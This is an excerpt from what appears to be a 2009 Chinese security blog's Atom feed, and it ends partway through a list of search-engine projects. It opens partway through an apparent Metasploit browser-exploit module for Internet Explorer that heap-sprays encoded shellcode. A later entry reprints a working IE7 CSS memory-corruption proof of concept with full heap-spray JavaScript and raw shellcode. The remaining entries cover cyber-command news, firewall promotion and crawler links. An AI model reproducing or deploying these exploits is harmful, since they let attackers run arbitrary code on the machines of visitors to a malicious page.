%Q|&lt;html&gt; <br/>&lt;head&gt; <br/>&lt;script&gt; <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var #{var_comment} = &#34;COMMENT&#34;; <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var #{var_x1} = new Array(); <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for (i = 0; i &lt; 200; i ++ ){ <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #{var_x1} = document.cr&#101;ateElement(#{var_comment}); <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #{var_x1}.data = &#34;#{var_abc}&#34;; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}; <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var #{var_e1} = null; <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var #{var_memory} = new Array(); <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var #{var_unescape} = unescape; <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;function #{var_boom}() { <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var #{var_shellcode} = #{var_unescape}( &#39;#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}&#39;); <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var #{var_spray} = #{var_unescape}( &#34;%&#34; + &#34;u&#34; + &#34;0&#34; + &#34;c&#34; + &#34;0&#34; + &#34;d&#34; + &#34;%u&#34; + &#34;0&#34; + &#34;c&#34; + &#34;0&#34; + &#34;d&#34; ); <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;do { #{var_spray} += #{var_spray} } while( #{var_spray}.length &lt; 0xd0000 ); <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for(#{var_i} = 0; #{var_i} &lt; 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode}; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;function #{var_ev1}(evt){ <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#{var_boom}(); <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#{var_e1} = document.cr&#101;ateEventObject(evt); <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;document.getElementById(&#34;#{var_sp1}&#34;).innerHTML = &#34;&#34;; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;window.setInterval(#{var_ev2}, 50); <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;function #{var_ev2}(){ <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;p = &#34;\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d&#34;; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for (i = 0; i &lt; #{var_x1}.length; i ++ ){ <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#{var_x1}.data = p; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var t = #{var_e1}.srcElement; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} <br/>&lt;/script&gt; <br/>&lt;/head&gt; <br/>&lt;body&gt; <br/><br/>&lt;span id=&#34;#{var_sp1}&#34;&gt;&lt;img src=&#34;#{get_resource}#{var_start}.gif&#34; onload=&#34;#{var_ev1}(event)&#34;&gt;&lt;/span&gt;&lt;/body&gt;&lt;/html&gt; <br/><br/>&lt;/body&gt; <br/>&lt;/html&gt; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;| <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# Transmit the compressed response to the client <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;send_response(cli, html, { &#39;Content-Type&#39; =&gt; &#39;text/html&#39;, &#39;Pragma&#39; =&gt; &#39;no-cache&#39; }) <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# Handle the payload <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;handler(cli) <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end <br/>end]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.friddy.cn/article.asp?id=116" /> 
	  <id>http://www.friddy.cn/default.asp?id=116</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[韩国明年元旦启动网络司令部]]></title>
	  <author>
		 <name>friddy</name>
		 <uri>http://www.friddy.cn/</uri>
		 <email>root@friddy.cn</email>
	  </author>
	  <category term="" scheme="http://www.friddy.cn/default.asp?cateID=12" label="水谭" /> 
	  <updated>2009-12-04T15:01:44+08:00</updated>
	  <published>2009-12-04T15:01:44+08:00</published>
		  <summary type="html"><![CDATA[据新华社电 <br/>&nbsp;&nbsp;&nbsp;&nbsp;韩国国防部官员12月1日说，集网络攻击与网络防护于一身的独立网络司令部定于明年元旦正式启用。<br/>　<br/>　“这(网络司令部)是一支独立部队，由200名专业技术人员构成，一名少将统管。”一名没有公开姓名的国防部官员告诉韩国联合通讯社。<br/><br/>　　韩联社援引另一国防部官员的话报道，网络司令部全面运作可能是在明年年中。<br/><br/>　　韩国总统府、国防部等机构的计算机网络今年7月连续遭遇黑客攻击，韩国国防部随后决定成立网络司令部。韩国国防安全司令部先前指责朝鲜黑客制造这些袭击活动。<br/><br/>　　依照韩联社说法，韩国独立网络司令部不仅承担网络安全维护与防护任务，还具备互联网攻击能力，可扰乱别国重要机构的网络运行。 <br/><br/>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.friddy.cn/article.asp?id=115" /> 
	  <id>http://www.friddy.cn/default.asp?id=115</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[milw0rm再次“复活”了]]></title>
	  <author>
		 <name>friddy</name>
		 <uri>http://www.friddy.cn/</uri>
		 <email>root@friddy.cn</email>
	  </author>
	  <category term="" scheme="http://www.friddy.cn/default.asp?cateID=12" label="水谭" /> 
	  <updated>2009-11-30T12:56:22+08:00</updated>
	  <published>2009-11-30T12:56:22+08:00</published>
		  <summary type="html"><![CDATA[大家找XX day都到这里：<br/><br/><a href="http://www.exploit-db.com/" target="_blank" rel="external">http://www.exploit-db.com/</a>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.friddy.cn/article.asp?id=114" /> 
	  <id>http://www.friddy.cn/default.asp?id=114</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[南京铱迅发现微软IE7.0 异常CSS导致内存破坏漏洞]]></title>
	  <author>
		 <name>friddy</name>
		 <uri>http://www.friddy.cn/</uri>
		 <email>root@friddy.cn</email>
	  </author>
	  <category term="" scheme="http://www.friddy.cn/default.asp?cateID=5" label="0day" /> 
	  <updated>2009-11-20T13:27:46+08:00</updated>
	  <published>2009-11-20T13:27:46+08:00</published>
		  <summary type="html"><![CDATA[详情请关注<br/><br/><a href="http://www.yxlink.com/newsview_15.html" target="_blank" rel="external"><a href="http://www.yxlink.com" target="_blank" rel="external">http://www.yxlink.com</a>/newsview_15.html</a><br/><br/>[Copy From yxlink.com]<br/><br/>+++++++++++++++++++++++++++++++++++++++++++++++++<br/><br/>1．漏洞介绍<br/>在XHTML 1.0标准下，使用特殊构造的CSS样式，在Internet Explorer 7.0 打开特定的网页后，Internet Explorer 7.0将发生内存崩溃，EIP指针将访问0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码，就可以执行任意命令。<br/> <br/>2．漏洞危害(危害等级高)<br/>黑客如果将含有“漏洞利用程序的网页”置于网站上，浏览过含有“漏洞利用程序的网页”的客户端将被运行特洛伊木马。<br/> <br/>3．通知途径<br/>已经向“国家漏洞库”提交。<br/> <br/>4．详细文档下载:&nbsp;&nbsp;[url]http://www.yxlink.com/download/[YV20090432]IE7vul.doc[/url]<br/> <br/>POC:<br/> <br/>&lt;!--<br/>请将以下内容粘贴到html文件中,成功后将跳出计算器程序<br/>南京铱迅信息技术有限公司（Nanjing Yxlink Information Technologies Co.,Ltd.）<br/><a href="http://www.yxlink.com" target="_blank" rel="external">http://www.yxlink.com</a><br/>--&gt;<br/>&lt;!DOCTYPE HTML PUBLIC &#34;-//W3C//DTD XHTML 1.0 Transitional//EN&#34; &#34;<a href="http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" target="_blank" rel="external">http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd</a>&#34;&gt;<br/>&lt;HTML xmlns=&#34;<a href="http://www.w3.org/1999/xhtml" target="_blank" rel="external">http://www.w3.org/1999/xhtml</a>&#34;&gt; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;HEAD&gt;<br/>&lt;script&gt;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;function load(){<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var e;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;e=document.getElementsByTagName(&#34;STYLE&#34;)[0];<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;e.outerHTML=&#34;1&#34;; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/script&gt;&nbsp;&nbsp;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;STYLE type=&#34;text/css&#34;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;body{ overflow: scroll; margin: 0; }<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/style&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;SCRIPT language=&#34;javascript&#34;&gt;<br/>var shellcode = unescape(&#34;%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063&#34;);<br/>var bigblock = unescape(&#34;%u9090%u9090&#34;);<br/>var headersize = 20;<br/>var slackspace = headersize+shellcode.length;<br/>while (bigblock.length&lt;slackspace) bigblock+=bigblock;<br/>fillblock = bigblock.substring(0, slackspace);<br/>block = bigblock.substring(0, bigblock.length-slackspace);<br/>while(block.length+slackspace&lt;0x40000) block = block+block+fillblock;<br/>memory = new Array();<br/>for (x=0; x&lt;4000; x++) memory[x] = block + shellcode;<br/>&lt;/script&gt;<br/> <br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;/HEAD&gt;&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BODY onload=&#34;load()&#34;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;/BODY&gt;<br/>&lt;/HTML&gt;]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.friddy.cn/article.asp?id=113" /> 
	  <id>http://www.friddy.cn/default.asp?id=113</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[搜狐公司哪个同学黑站也不记得挂VPN]]></title>
	  <author>
		 <name>friddy</name>
		 <uri>http://www.friddy.cn/</uri>
		 <email>root@friddy.cn</email>
	  </author>
	  <category term="" scheme="http://www.friddy.cn/default.asp?cateID=12" label="水谭" /> 
	  <updated>2009-11-19T19:11:47+08:00</updated>
	  <published>2009-11-19T19:11:47+08:00</published>
		  <summary type="html"><![CDATA[今天下午抓到的攻击报文，<br/>搜狐公司哪个同学想黑我们公司站，也不记得挂VPN。。。。。。<br/><br/>直接上图<br/><br/><img src="http://www.friddy.cn/attachments/month_0911/u20091119191136.jpg" border="0" alt=""/><br/><br/><br/><img src="http://www.friddy.cn/attachments/month_0911/n20091120102121.jpg" border="0" alt=""/><br/>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.friddy.cn/article.asp?id=112" /> 
	  <id>http://www.friddy.cn/default.asp?id=112</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[安全界神话-------新一代软件“Web应用防火墙”]]></title>
	  <author>
		 <name>friddy</name>
		 <uri>http://www.friddy.cn/</uri>
		 <email>root@friddy.cn</email>
	  </author>
	  <category term="" scheme="http://www.friddy.cn/default.asp?cateID=12" label="水谭" /> 
	  <updated>2009-11-05T22:12:36+08:00</updated>
	  <published>2009-11-05T22:12:36+08:00</published>
		  <summary type="html"><![CDATA[<p>&nbsp;</p>
<div>&nbsp;&nbsp;&nbsp; 新一代软件&ldquo;Web应用防火墙&rdquo;的性能与兼容瓶颈已经得到解决的同时，性能甚至超多大批硬件&ldquo;Web应用防火墙&rdquo;。国内外业界对新一代的软件&ldquo;Web应用防火墙&rdquo;一致看好。一位资深安全专家表示：新一代软件&ldquo;Web应用防火墙&rdquo;实在是太神奇了！</div>
<div><span>&nbsp;</span></div>
<div><span>&nbsp;&nbsp;&nbsp; </span>相比两、三年前的软件&ldquo;Web应用防火墙&rdquo;，如今的软件&ldquo;Web应用防火墙&rdquo;每秒可以处理的HTTP请求的次数已经达到每秒15000次（2.5Ghz CPU占用低于5%），千兆吞吐能力甚至可以达到950Mbps至980Mbps，支持10000至35000用户同时在线。</div>
<div><span>&nbsp;</span></div>
<div><span>&nbsp;&nbsp;&nbsp; </span>据记者了解，新一代软件&ldquo;Web应用防火墙&rdquo;性能得到极大提高的原因在于：</div>
<div><span>&nbsp;&nbsp;&nbsp; </span>一．采用NDIS驱动技术。新一代软件&ldquo;Web应用防火墙&rdquo;相比两、三年前使用ISAPI技术的软件&ldquo;Web应用防火墙&rdquo;，性能的提升可以达到十到二十倍。传统的ISAPI技术的软件&ldquo;Web应用防火墙&rdquo;，网络报文数据的传递路径为：网卡-&gt;操作系统(OS)-&gt;IIS-&gt;ISAPI-&gt;检测引擎-&gt;ISAPI-&gt;IIS；而采用NDIS驱动技术的软件&ldquo;Web应用防火墙&rdquo;，网络报文数据的传递路径为：网卡-&gt;NDIS驱动-&gt;检测引擎-&gt;操作系统(OS)-&gt;IIS(Apache)。</div>
<div><span>&nbsp;&nbsp;&nbsp; </span>二．新的软件&ldquo;Web应用防火墙&rdquo;，网络报文的获取不再依赖于IIS，&ldquo;Web应用防火墙&rdquo;可以先于操作系统处理数据，减少了IIS与ISAPI的传输瓶颈。新的软件&ldquo;Web应用防火墙&rdquo;优化网络报文处理结构的同时，大幅提高了性能。</div>
<div><span>&nbsp;&nbsp;&nbsp; </span>三．算法上的优化。据国内新一代&ldquo;Web应用防火墙&rdquo;设计厂商，南京铱迅信息的研发部总监介绍：新式的软件&ldquo;Web应用防火墙&rdquo;（铱迅网站应用防火墙），采用了三层的检测算法：包括关键匹配、正则匹配、虚拟执行，其中虚拟执行技术，在提高检测速度的同时，还可以大大降低误报的发生。</div>
<div><span>&nbsp;</span></div>
<div><span>&nbsp;&nbsp;&nbsp; </span>据记者了解，新一代软件&ldquo;Web应用防火墙&rdquo;相比&ldquo;硬件Web应用防火墙&rdquo;有着许多先天的优势：</div>
<div><span>&nbsp;&nbsp;&nbsp; </span>一．快速部署。只要在服务器安装上软件，服务器就立即处于细粒度保护状态，全面防御SQL注入、缓冲区溢出等攻击。</div>
<div><span>&nbsp;&nbsp;&nbsp; </span>二．更适合托管服务器用户。目前在IDC机房，每增加一台硬件防火墙，通常需要多占用一个1U或者2U的机位，而一个机位的费用在3000到7000RMB每年不等。</div>
<div><span>&nbsp;&nbsp;&nbsp; </span>三．性价比更高。软件&ldquo;Web应用防火墙&rdquo;每年的费用在2000元以下。相比动辄15万RMB到50万RMB的硬件防火墙，降低了几个数量级。</div>
<div><span>&nbsp;</span></div>
<div><span>&nbsp;&nbsp;&nbsp; </span>记者采访了南京铱迅信息的研发部总监，从今年6、7月份开始，铱迅信息推出的&ldquo;铱迅网站防火墙&rdquo;解决了大量门户网站、政府部门、企业网站被黑客入侵的问题。网站只要安装&ldquo;铱迅网站防火墙&rdquo;软件，就可以解除SQL注入、群注、跨站、溢出等安全威胁。对于个人用户，铱迅信息特别推出了&ldquo;铱迅网站防火墙&rdquo;标准版，个人用户可以免费使用。在谈到个人对软件&ldquo;Web应用防火墙&rdquo;的看法的时候，南京铱迅信息的研发部总监笑了笑，说：&ldquo;如今软件可以解决的安全问题，为什么需要花费几十万元人民币呢？&rdquo;</div>
<div><span>&nbsp;</span></div>
<div><span>&nbsp;&nbsp;&nbsp; </span>新一代软件&ldquo;Web应用防火墙&rdquo;是安全业界里一个新的神话、新的亮点！</div>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.friddy.cn/article.asp?id=111" /> 
	  <id>http://www.friddy.cn/default.asp?id=111</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[【下载】驱动级的“网站黑客防火墙”]]></title>
	  <author>
		 <name>friddy</name>
		 <uri>http://www.friddy.cn/</uri>
		 <email>root@friddy.cn</email>
	  </author>
	  <category term="" scheme="http://www.friddy.cn/default.asp?cateID=12" label="水谭" /> 
	  <updated>2009-11-03T10:38:03+08:00</updated>
	  <published>2009-11-03T10:38:03+08:00</published>
		  <summary type="html"><![CDATA[<p><img hspace="15" src="http://sales.yxlink.com/images/webfirewall.jpg" vspace="10" style="float: right" alt="" /> <span class="orange">铱迅网站防火墙</span> <br />
国内首款真正意义上的专业网站防黑软件，全面解决网站遭到黑客攻击的问题</p>
<p><span class="orange">★铱迅Web应用防火墙</span> <br />
支持Web平台:Windows驱动技术（非ISAPI），全面支持IIS、Apache、Nginx、Websphere等<br />
&nbsp;</p>
<p><span class="orange">★超高速黑客攻击数据包检测引擎</span> <span class="orange">，100%优化性能</span><br />
高速检测引擎，100Mbps下，CPU消耗&lt;=3%，每秒可处理15000+个报文</p>
<p><span class="orange">★特色功能</span><br />
<img alt="Check" src="http://sales.yxlink.com/images/check_premium.gif" /> 支持IIS、Apache、Websphere等所有Web服务器<br />
<img alt="Check" src="http://sales.yxlink.com/images/check_premium.gif" /> 防止URL SQL注入、群注、XSS跨站<br />
<a onclick="if(document.getElementById('email').value.indexOf('@')==-1){openLogin();}else{location.href='user.php';}" href="http://sales.yxlink.com/index.html#"><img hspace="15" src="http://sales.yxlink.com/images/get-01.jpg" vspace="10" border="0" style="float: right" alt="" /></a> <img alt="Check" src="http://sales.yxlink.com/images/check_premium.gif" /> 防止关键文件下载(如.mdb,web.config文件)<br />
<img alt="Check" src="http://sales.yxlink.com/images/check_premium.gif" /> 防止缓冲区溢出<br />
<img alt="Check" src="http://sales.yxlink.com/images/check_premium.gif" /> 防止远程文件包含<br />
<img alt="Check" src="http://sales.yxlink.com/images/check_premium.gif" /> 防止机器人爬虫、自动攻击<br />
<img alt="Check" src="http://sales.yxlink.com/images/check_premium.gif" /> 封锁攻击者IP，支持设定阻断时间<br />
<img alt="Check" src="http://sales.yxlink.com/images/check_premium.gif" /> 信任脚本控制（白名单）<br />
<img alt="Check" src="http://sales.yxlink.com/images/check_premium.gif" /> 软件在线更新、特征库升级<br />
&nbsp;<img alt="Check" src="http://sales.yxlink.com/images/check_premium.gif" /> Web服务器访问优化<br />
<img alt="Check" src="http://sales.yxlink.com/images/check_business.gif" /> 防止Cookie SQL注入、群注、XSS跨站<br />
<img alt="Check" src="http://sales.yxlink.com/images/check_business.gif" /> 防止POST SQL注入、群注、XSS跨站<a href="http://sales.yxlink.com/buy.html"><img hspace="15" src="http://sales.yxlink.com/images/get-02.jpg" vspace="10" border="0" style="float: right" alt="" /></a><br />
<img alt="Check" src="http://sales.yxlink.com/images/check_business.gif" /> 防止访问网页木马<br />
<img alt="Check" src="http://sales.yxlink.com/images/check_ultimate.gif" /> 防止网站盗链<br />
<img alt="Check" src="http://sales.yxlink.com/images/check_ultimate.gif" /> 防止CC攻击<br />
<img alt="Check" src="http://sales.yxlink.com/images/check_ultimate.gif" /> 自定义包过滤规则</p>
<p>&nbsp;</p>
<p>下载地址：<a href="http://sales.yxlink.com/download.html">http://sales.yxlink.com/download.html</a></p>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.friddy.cn/article.asp?id=110" /> 
	  <id>http://www.friddy.cn/default.asp?id=110</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[搜索引擎/网络蜘蛛程序代码]]></title>
	  <author>
		 <name>friddy</name>
		 <uri>http://www.friddy.cn/</uri>
		 <email>root@friddy.cn</email>
	  </author>
	  <category term="" scheme="http://www.friddy.cn/default.asp?cateID=12" label="水谭" /> 
	  <updated>2009-10-30T22:12:34+08:00</updated>
	  <published>2009-10-30T22:12:34+08:00</published>
		  <summary type="html"><![CDATA[<p><strong>1、Nutch<br />
</strong><a target="_blank" href="http://lucene.apache.org/nutch/"><strong><img alt="" border="0" src="http://lucene.apache.org/nutch/images/nutch-logo.gif" /></strong></a><br />
官方网站 <a target="_blank" href="http://www.nutch.org/"><font color="#0000ff">http://www.nutch.org/</font></a><br />
中文站点 <a target="_blank" href="http://www.nutchchina.com/"><font color="#0000ff">http://www.nutchchina.com/</font></a><br />
最新版本：Nutch 0.7.2 Released<br />
Nutch 是一个开源Java 实现的<span class="t_tag" href="tag.php?name=%CB%D1%CB%F7">搜索</span>引擎。它提供了我们运行自己的<span class="t_tag" href="tag.php?name=%CB%D1%CB%F7">搜索</span>引擎所需的全部工具，可以建立自己内部网的<span class="t_tag" href="tag.php?name=%CB%D1%CB%F7">搜索</span>引擎，也可以针对整个<span class="t_tag" href="tag.php?name=%CD%F8%C2%E7">网络</span>建立<span class="t_tag" href="tag.php?name=%CB%D1%CB%F7">搜索</span>引擎。自由(Free)而免费(Free)。<br />
<strong>2、Lucene</strong><br />
<a target="_blank" href="http://lucene.apache.org/"><img alt="" border="0" src="http://lucene.apache.org/images/lucene_green_300.gif" /></a><br />
官方网站&nbsp;&nbsp;<a target="_blank" href="http://lucene.apache.org/"><font color="#0000ff">http://lucene.apache.org</font></a><br />
中文站点&nbsp;&nbsp;<a target="_blank" href="http://www.lucene.com.cn/"><font color="#0000ff">http://www.lucene.com.cn/</font></a><br />
Lucene是apache软件基金会 jakarta项目组的一个子项目，是一个开放源代码的全文检索引擎工具包[用Java写的]，即它不是一个完整的全文检索引擎，而是一个全文检索引擎的架构，提供了完整的查询引擎和索引引擎，部分文本分析引擎（英文与德文两种西方语言）。Lucene的目的是为软件开发人员提供一个简单易用的工具包，以方便的在目标系统中实现全文检索的功能，或者是以此为基础建立起完整的全文检索引擎。<br />
<strong>3、Larbin</strong>: <a target="_blank" href="http://larbin.sourceforge.net/index-eng.html"><font color="#0000ff">http://larbin.sourceforge.net/index-eng.html</font></a><br />
larbin是一种开源的网络爬虫/网络蜘蛛，由法国的年轻人 S&eacute;bastien Ailleret独立开发。larbin目的是能够跟踪页面的url进行扩展的抓取，最后为搜索引擎提供广泛的数据来源。<br />
国内开发的相关程序<br />
<strong>1、SQLET - 开放源码的中文搜索引擎</strong> <br />
官方网站 <a target="_blank" href="http://www.sqlet.com/"><font color="#0000ff">http://www.sqlet.com/</font></a><br />
SQLET，是Search &amp; Query &amp;Link, 加后缀 let，表示小的，小型的意思.打算建立一个能搜上亿张网页的基于主题功能的中文搜索引擎.支持3种索引方式：MySql_table_Index，Lucene_Index，SQLET_Index.网页抓取可以保存在文件系统及数据库里。自带WebServer.<br />
<strong>2、菲度垂直搜索引擎代码</strong> <br />
菲度<a target="_blank" href="http://www.faydu.net/"><font color="#0000ff">http://www.faydu.net</font></a> 为一个垂直在线搜索的演示版，主要对国内一些购物站点进行搜索整理，<br />
语言：VB.net(c#)<br />
<strong>二、中文分词程序代码</strong><br />
<strong>1、计算所汉语词法分析系统 ICTCLAS</strong><br />
<span class="t_tag" href="tag.php?name=%D6%D0%B9%FA">中国</span>科学院计算技术研究所在多年研究基础上，耗时一年研制出了基于多层隐马模型的汉语词法分析系统 ICTCLAS(Institute of Computing Technology, Chinese Lexical Analysis System)，该系统的功能有：中文分词；词性标注；未登录词识别。分词正确率高达97.58%(最近的973专家组评测结果)，基于角色标注的未登录词识别能取得高于90%召回率，其中<span class="t_tag" href="tag.php?name=%D6%D0%B9%FA">中国</span>人名的识别召回率接近98%，分词和词性标注处理速度为31.5KB/s。ICTCLAS 和计算所其他14项免费发布的成果被中外媒体广泛地报道，国内很多免费的中文分词模块都或多或少的参考过ICTCLAS的代码。<br />
下载页面：<a target="_blank" href="http://www.nlp.org.cn/project/project.php?proj_id=6"><font color="#0000ff">http://www.nlp.org.cn/project/project.php?proj_id=6</font></a><br />
由于 ICTCLAS 是由 C 语言写成的，现在主流的开发工具用起来不太方便，于是有一些热心的程序员把 ICTCLAS 改为 Java 和 C# 等其他语言。<br />
（1）fenci，Java 的 ICTCLAS，下载页面：<a target="_blank" href="http://www.xml.org.cn/printpage.asp?BoardID=2&amp;id=11502"><font color="#0000ff">http://www.xml.org.cn/printpage.asp?BoardID=2&amp;id=11502</font></a><br />
（2）AutoSplit，另一个 Java 的 ICTCLAS，已经找不到下载页面，点击本地下载<br />
（3）小叮咚中文分词，曾经有下载页面，现在找不到了。据作者介绍，从 ICTCLAS 中改进，有 Java，C# 和 C++ 三个版本，介绍页面：<a target="_blank" href="http://www.donews.net/accesine"><font color="#0000ff">http://www.donews.net/accesine</font></a><br />
